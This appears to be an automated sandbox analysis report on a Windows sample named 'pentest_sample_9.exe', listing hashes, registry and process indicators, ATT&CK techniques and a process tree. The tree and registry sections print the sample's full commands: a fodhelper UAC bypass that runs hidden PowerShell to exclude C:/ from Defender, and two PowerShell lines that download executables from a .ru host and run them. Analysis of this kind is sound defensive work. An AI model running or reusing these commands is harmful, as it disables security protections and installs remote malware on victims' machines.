b2057aec63a5c471952ef1dcbbe67169d69a9dec35c24432d2e2482d04a8f382

General

Target

output/pentest_sample_9.exe
Size

104.3MB
MD5

ac2724c5bd5798a134b71f697a3443bb
SHA1

096636eb16106cf32eab5298aaf98129284047d8
SHA256

568d62692ac0e7667cb925719d2535f548488c96d9b0747cb97dc05ff640a2b3
SHA512

183b039aa847d1c65a27cfed180636f0385c172345ba01cc839afffb4b2910d9f13561a3a9a6fbaa321e1826d17fdf1ac71f2dd5cec4a56e2728d098c835f5db
SSDEEP

6144:MUamA5h1WvUcZ1SDAghiEwTZwmohzf71XsfKr0Ao:OmM1WvJZ1S0ghilqmol1sulo

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	pentest_sample_9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg\shell	pentest_sample_9.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg\shell\open	pentest_sample_9.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg\shell	pentest_sample_9.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg	pentest_sample_9.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg\shell\open\command	pentest_sample_9.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg	pentest_sample_9.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg\shell\open\command\ = "C:\\Windows\\system32\\mshta.exe vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run(\"\"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden Add-MpPreference -ExclusionPath C:/\"\", 0)(window.close)\")"	pentest_sample_9.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	fodhelper.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg\shell\open\command	pentest_sample_9.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\gg\shell\open	pentest_sample_9.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3436	powershell.exe
3436	powershell.exe
4072	powershell.exe
4136	powershell.exe
4072	powershell.exe
4136	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 4692 wrote to memory of 2304	4692	pentest_sample_9.exe	81
PID 4692 wrote to memory of 2304	4692	pentest_sample_9.exe	81
PID 2304 wrote to memory of 1600	2304	fodhelper.exe	82
PID 2304 wrote to memory of 1600	2304	fodhelper.exe	82
PID 1600 wrote to memory of 3436	1600	mshta.exe	83
PID 1600 wrote to memory of 3436	1600	mshta.exe	83
PID 4692 wrote to memory of 4136	4692	pentest_sample_9.exe	94
PID 4692 wrote to memory of 4136	4692	pentest_sample_9.exe	94
PID 4692 wrote to memory of 4072	4692	pentest_sample_9.exe	96
PID 4692 wrote to memory of 4072	4692	pentest_sample_9.exe	96

C:\Users\Admin\AppData\Local\Temp\output\pentest_sample_9.exe
"C:\Users\Admin\AppData\Local\Temp\output\pentest_sample_9.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4692
- C:\Windows\System32\fodhelper.exe
  "C:\Windows\System32\fodhelper.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden Add-MpPreference -ExclusionPath C:/"", 0)(window.close)")
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden Add-MpPreference -ExclusionPath C:/
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://rwwmefkauiaa.ru/bs8bo90akv.exe -OutFile "$env:appdata/Microsoft/dllservice.exe"; Start-Process -Filepath "$env:appdata/Microsoft/dllservice.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; mkdir "$env:appdata/Microsoft/AddIns"; Invoke-WebRequest http://rwwmefkauiaa.ru/u84ls.exe -OutFile "$env:appdata/Microsoft/AddIns/exclusions.exe"; Start-Process -Filepath "$env:appdata/Microsoft/AddIns/exclusions.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
332B

MD5
e0b10effb19e5b302e296d75aa1e127f

SHA1
32fa9f4865f369cf0bf1752bc76e7e1fbadfab1b

SHA256
2f6205776e2378a07ec839afd3e9cd605b8db8d54a5a8b1019227fc9989735f7

SHA512
ac4a185967f4d78d0734863783df57c15f19fde63f22b4350a29cefcf8cdeeffb26b48257039b4da9f71b96cbcd60ec98cb25646c902156132648ad8b3508839

Download Submit
memory/3436-136-0x00000202A2850000-0x00000202A2872000-memory.dmp

Filesize
136KB

Download
memory/3436-138-0x00007FFAB46F0000-0x00007FFAB51B1000-memory.dmp

Filesize
10.8MB

Download
memory/3436-137-0x00007FFAB46F0000-0x00007FFAB51B1000-memory.dmp

Filesize
10.8MB

Download
memory/4072-143-0x00007FFAB64D0000-0x00007FFAB6F91000-memory.dmp

Filesize
10.8MB

Download
memory/4072-145-0x00007FFAB64D0000-0x00007FFAB6F91000-memory.dmp

Filesize
10.8MB

Download
memory/4136-144-0x00007FFAB64D0000-0x00007FFAB6F91000-memory.dmp

Filesize
10.8MB

Download
memory/4136-147-0x00007FFAB64D0000-0x00007FFAB6F91000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing